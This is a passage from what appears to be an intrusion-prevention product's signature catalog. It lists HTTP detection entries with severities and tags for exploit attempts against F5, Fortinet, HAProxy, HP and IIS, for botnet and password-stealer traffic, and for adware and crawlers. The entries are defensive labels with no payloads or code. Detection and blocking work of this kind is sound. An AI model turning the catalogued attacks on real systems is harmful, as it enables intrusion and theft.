Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986
Description:
Back to top

HTTP_CSH-F5-Request-Smuggling-CVE-2023-46747

About this situation: An attempt to exploit a vulnerability in F5 Networks BIG-IP detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, F5 Networks BIG-IP, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: F5-Request-Smuggling-CVE-2023-46747
Description:
Back to top

HTTP_CSH-FakeLookout-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Android.Trojan.FakeLookout-Botnet
Description:
Back to top

HTTP_CSH-Fareit-4-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.PasswordStealer.Fareit-4-Botnet
Description:
Back to top

HTTP_CSH-Fastify-Contenttypeparser-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Fastify detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Fastify, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1518-5242
Vulnerability: Fastify-Contenttypeparser-Denial-Of-Service
Description:
Back to top

HTTP_CSH-FDM-P2P-Client

About this situation: FDM P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Felismus-Malware-Request

About this situation: A HTTP request resembling Felismus Malware traffic
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Felismus-Malware
Description:
Back to top

HTTP_CSH-File-Name-Directory-Traversal

About this situation: Directory traversal ../ in a file name
Context: HTTP Request Header Line
Severity: 10
Tags: Windows, Any Hardware, WWW File Share Pro, CVE2004, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-9-1102
Last changed: sgpkg-ips-1820-5242
Vulnerability: HTTP-WWW-File-Share-Pro-Directory-Traversal
Description:
Back to top

HTTP_CSH-Firefox-Browser-Usage

About this situation: Firefox browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1283-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Foreign-Botnet-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-841-5242
Last changed: sgpkg-ips-841-5242
Vulnerability: Foreign-Botnet
Description:
Back to top

HTTP_CSH-Fortinet-FortiOS-Authentication-Bypass-CVE-2024-55591

About this situation: An attempt to exploit a vulnerability in Fortinet FortiOS detected
Context: HTTP Request Header Line
Severity: 7
Tags: FortiOS, Any Hardware, CVE2024, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Vulnerability: Fortinet-FortiOS-Authentication-Bypass-CVE-2024-55591
Description:
Back to top

HTTP_CSH-FortiOS-Authentication-Bypass-CVE-2022-40684

About this situation: An attempt to exploit a vulnerability in FortiOS detected
Context: HTTP Request Header Line
Severity: 7
Tags: FortiOS, Any Hardware, CVE2022, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1514-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: FortiOS-Authentication-Bypass-CVE-2022-40684
Description:
Back to top

HTTP_CSH-FreeBSD-Portscout-Usage

About this situation: FreeBSD portscout usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, FreeBSD portscout, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-286-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-FreePBX-Framework-Asterisk-Recording-Interface-Unserialize-Code-Execution

About this situation: An attempt to exploit a vulnerability in FreePBX Project FreePBX detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, FreePBX, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1732-5242
Vulnerability: FreePBX-Framework-Asterisk-Recording-Interface-Unserialize-Code-Execution
Description:
Back to top

HTTP_CSH-FunWebProducts-Activity

About this situation: Detects FunWebProducts browser plugin activity
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, x86, FunWebProducts, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-485-5211
Vulnerability: FunWebProducts
Description:
Back to top

HTTP_CSH-FunWebProducts-mywebsearch-Toolbar

About this situation: FunWebProducts mywebsearch toolbar
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Mywebsearch, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-224-3038
Vulnerability: HTTP_FunWebProducts-mywebsearch
Description:
Back to top

HTTP_CSH-Furtims-Parent-Nullptr-Host-Field

About this situation: A suspicious hostname in HTTP
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Successful Attacks, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1641-5242
Vulnerability: Furtims-Parent-Nullptr-Host-Field
Description:
Back to top

HTTP_CSH-Gain-Publishing-Installer

About this situation: Gainpublishing installer detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Gator, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: Gator
Description:
Back to top

HTTP_CSH-Gator-User-Agent

About this situation: Gator User-Agent detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Gator, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: Gator
Description:
Back to top

HTTP_CSH-Gauss-Bot-Traffic-Detected

About this situation: Gauss Bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Gauss-Bot
Description:
Back to top

HTTP_CSH-Generic-Java-Application

About this situation: Generic Java application usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-GitHub-Enterprise-Default-Session-Secret-And-Deserialization-Vulnerability

About this situation: A Github Enterprise Default Session Secret And Deserialization vulnerability
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Linux, Mac OS X, Any Hardware, Github, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Vulnerability: GitHub-Enterprise-Default-Session-Secret-And-Deserialization-Vulnerability
Description:
Back to top

HTTP_CSH-GlobalSpec-Ocelli-Web-Spider

About this situation: GlobalSpec Ocelli web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, GlobalSpec Ocelli, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-250-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Gogs-File-Upload-Tree_path-Command-Injection

About this situation: An attempt to exploit a vulnerability in Gogs detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Gogs, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1462-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Gogs-File-Upload-Tree_path-Command-Injection
Description:
Back to top

HTTP_CSH-Google-Desktop-Usage

About this situation: Google desktop usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Google Desktop, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-241-3038
Last changed: sgpkg-ips-241-3038
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Googlebot-Image-Web-Spider

About this situation: Googlebot image web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Googlebot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Googlebot-Mediapartners-Web-Spider

About this situation: Google mediapartners web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Googlebot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Googlebot-Mobile-Web-Spider

About this situation: Googlebot mobile web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Googlebot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Googlebot-Web-Spider

About this situation: Googlebot web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Googlebot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-197-2032
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-GoogleEarth-Usage

About this situation: GoogleEarth usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, GoogleEarth, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-1283-5242
Description:
Back to top

HTTP_CSH-Grendel-Scan-Vulnerability-Scanner-Usage

About this situation: Grendel-Scan vulnerability scanner usage detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Grendel-Scan, Any Operating System not specific, Potential Probe, TCP Client Traffic
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: Grendel-Scan-Vulnerability-Scanner-Usage
Description:
Back to top

HTTP_CSH-GroundWork-Monitor-Monarch-Scan-Ref-1

About this situation: A suspicious referer for GroundWork Monitor Monarch Scan component detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, GroundWork Monitor Enterprise, CVE2013, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-536-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: GroundWork-Monitor-Monarch-Scan-Ref
Description:
Back to top

HTTP_CSH-Haproxy-Client-And-Server-Cookie-Parsing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in HAProxy HAProxy detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HAProxy, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Haproxy-Client-And-Server-Cookie-Parsing-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Haproxy-Empty-Header-Name-Access-Control-Bypass

About this situation: An attempt to exploit a vulnerability in HAProxy detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HAProxy, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1571-5242
Last changed: sgpkg-ips-1573-5242
Vulnerability: Haproxy-Empty-Header-Name-Access-Control-Bypass
Description:
Back to top

HTTP_CSH-Haproxy-HTTP-Header-Handling-Integer-Overflow-Vulnerability

About this situation: An attempt to exploit a vulnerability in HAProxy detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Unix, Linux, Any Hardware, HAProxy, CVE2021, Unix not specific, Linux not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Haproxy-HTTP-Header-Handling-Integer-Overflow-Vulnerability
Description:
Back to top

HTTP_CSH-Havij-SQL-Injection-Tool-Usage

About this situation: Havij SQL Injection tool usage detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-Havij-SQL-Injection-Tool
Description:
Back to top

HTTP_CSH-Header-Integer-Percent-Encoding

About this situation: A percent encodings in odd HTTP headers detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-684-5211
Vulnerability: Header-Integer-Percent-Encoding
Description:
Back to top

HTTP_CSH-Herpsnet-Bot-Traffic

About this situation: HerpsNet Bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Herpsnet-Bot
Description:
Back to top

HTTP_CSH-Home-Router-UPnP-Flash-Vulnerability

About this situation: An attempt to exploit a vulnerability in UPnP was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, UPnP, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Home-Router-UPnP-Flash-Vulnerability
Description:
Back to top

HTTP_CSH-Hongtoutou-Adrd-Bot-Traffic-Detected

About this situation: HongTouTou-ADRD bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, HongTouTou, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Hongtoutou-Adrd-Bot
Description:
Back to top

HTTP_CSH-Hotbar-Activity

About this situation: Hotbar Internet Explorer toolbar activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Hotbar, Windows not specific, Hotbar not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-615-5211
Vulnerability: Hotbar
Description:
Back to top

HTTP_CSH-Hotbar-Install

About this situation: Hotbar installation detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Hotbar, Windows not specific, Hotbar not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-615-5211
Vulnerability: Hotbar
Description:
Back to top

HTTP_CSH-Hotbar-Weather-Service-Activity

About this situation: Hotbar Weather Service activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Hotbar Weather Service, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-35-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: Hotbar
Description:
Back to top

HTTP_CSH-HP-Managed-Printing-Administration-Remote-Command-Execution

About this situation: An attempt to exploit an HP Managed Printing Administration Remote Command Execution vulnerability detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Managed Printing Administration, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-785-5211
Last changed: sgpkg-ips-785-5211
Vulnerability: HP-Managed-Printing-Administration-Remote-Command-Execution
Description:
Back to top

HTTP_CSH-HP-OpenView-Network-Node-Manager-Ovalarm.exe-Accept-Lang-BOF

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1733-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Ovalarm.exe-Accept-Language-Buffer-Overflow
Description:
Back to top

HTTP_CSH-HP-OpenView-Network-Node-Manager-OvJavaLocale-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-327-4219
Last changed: sgpkg-ips-513-5211
Vulnerability: HP-OpenView-Network-Node-Manager-OvJavaLocale-Buffer-Overflow
Description:
Back to top

HTTP_CSH-HP-OpenView-Network-Node-Manager-OvOSLocale-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1733-5242
Vulnerability: HP-OpenView-Network-Node-Manager-OvOSLocale-Parameter-Buffer-Overflow
Description:
Back to top

HTTP_CSH-HP-OpenView-Nnmrptconfig-Schd-And-Nameparams-Potential-BOF

About this situation: An attempt to exploit a vulnerability in HP OpenView Network Node Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Network Node Manager, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-430-4219
Last changed: sgpkg-ips-1740-5242
Vulnerability: HP-OpenView-Network-Node-Manager-Nnmrptconfig-Schdparams-And-Nameparams-BOF
Description:
Back to top

HTTP_CSH-HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution

About this situation: An attempt to exploit a vulnerability in HP OpenView Performance Insight (OVPI) detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP OpenView Performance Insight, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-512-5211
Vulnerability: HP-OpenView-Performance-Insight-Server-Backdoor-Account-Code-Execution
Description:
Back to top

HTTP_CSH-HP-Operations-Manager-Server-Unauthorized-File-Upload

About this situation: An attempt to exploit a vulnerability in HP Operations Manager for Windows detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HP Operations Manager for Windows, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1588-5242
Vulnerability: HP-Operations-Manager-Server-Unauthorized-File-Upload
Description:
Back to top

HTTP_CSH-HPE-Integrated-Lights-Out-CVE-2017-12542

About this situation: An attempt to exploit a vulnerability in HPE iLO detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, HPE iLO, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1470-5242
Vulnerability: HPE-Integrated-Lights-Out-CVE-2017-12542
Description:
Back to top

HTTP_CSH-HS.fi-iPhone-Application-Usage

About this situation: HS.fi iPhone application usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Apple iPhone, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-HTTP2-Upgrade-Header

About this situation: An Upgrade header requesting usage of HTTP/2 protocol was seen
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-842-5242
Last changed: sgpkg-ips-842-5242
Description:
Back to top

HTTP_CSH-Httper

About this situation: HTTPER traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, HTTPER, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-616-5211
Vulnerability: Httper
Description:
Back to top

HTTP_CSH-HTTrack-Tool-Usage

About this situation: HTTrack web site mirroring tool usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, HTTrack, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Hulu-Access

About this situation: Detects Hulu access
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Hulu, Any Operating System not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-378-4219
Vulnerability: Hulu-Online-Video-Service
Description:
Back to top

HTTP_CSH-HuntBar-Download

About this situation: HuntBar download detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, HuntBar, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: HuntBar
Description:
Back to top

HTTP_CSH-Hupigon.AIPM-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Backdoor.Hupigon-Botnet
Description:
Back to top

HTTP_CSH-IBM-Cognos-Server-Backdoor-Account-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in IBM Cognos Express detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Cognos Express, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1588-5242
Vulnerability: IBM-Cognos-Server-Backdoor-Account-Remote-Code-Execution
Description:
Back to top

HTTP_CSH-IBM-Rational-Quality-Manager-And-Test-Lab-Manager-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in IBM Rational Quality Manager and Test Lab Manager detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Rational Quality Manager and Test Lab Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1588-5242
Vulnerability: IBM-Rational-Quality-Manager-And-Test-Lab-Manager-Policy-Bypass
Description:
Back to top

HTTP_CSH-IBM-WebSphere-Waspostparam-Cookie-Untrusted-Java-Deserialization

About this situation: An attempt to exploit a vulnerability in IBM WebSphere Application Server detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, IBM WebSphere Application Server, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-813-5242
Vulnerability: IBM-WebSphere-Waspostparam-Cookie-Untrusted-Java-Deserialization
Description:
Back to top

HTTP_CSH-IcedID-Trojan-Infection-Traffic

About this situation: IcedID trojan infection traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: IcedID-Trojan-Infection-Traffic
Description:
Back to top

HTTP_CSH-Iceweasel-Browser-Usage

About this situation: Iceweasel browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Iceweasel, Any Operating System not specific, Major Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-393-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-IEPlugin

About this situation: Browser Plugin IEPlugin
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, IEPlugin, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: IEPlugin
Description:
Back to top

HTTP_CSH-IIS-Asp-Chunked-Encoding-Transfer-Heap-Overflow

About this situation: Heap overflow in IIS 4/5
Context: HTTP Request Header Line
Severity: 10
Tags: Windows, Any Hardware, IIS 5.0, IIS 4.0, MS2002, CVE2002, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-702-5211
Vulnerability: HTTP-IIS-Asp-Chunked-Transfer-Encoding-Heap-Overflow
Description:
Back to top

HTTP_CSH-IIS-Htr-Chunked-Transfer-Encoding-Vulnerability

About this situation: Detects chunked encoded requests to HTR files
Context: HTTP Request Header Line
Severity: 7
